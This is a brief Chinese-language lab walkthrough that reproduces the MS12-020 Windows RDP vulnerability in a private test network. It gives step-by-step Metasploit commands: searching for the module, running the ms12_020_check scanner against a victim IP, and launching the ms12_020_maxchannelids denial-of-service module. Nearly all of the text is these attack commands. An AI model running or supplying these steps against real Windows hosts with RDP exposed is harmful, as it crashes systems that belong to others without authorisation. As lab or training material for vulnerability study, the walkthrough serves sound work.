环境
攻击者:kaili(192.168.160.179)
受害者:XP、2003、2008 、Win7、等一些开了3389的
受害者IP:192.168.160.174
漏洞复现:
1、利用msf来检查对方是否有MS12-020的漏洞
search ms12-020
2、利用此模块来检查是否有此漏洞
use auxiliary/scanner/rdp/ms12_020_check
set rhost 受害者IP
show options #查看要配置的信息
run
3、EXP利用
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost 192.168.160.174
run
附成功后的图👇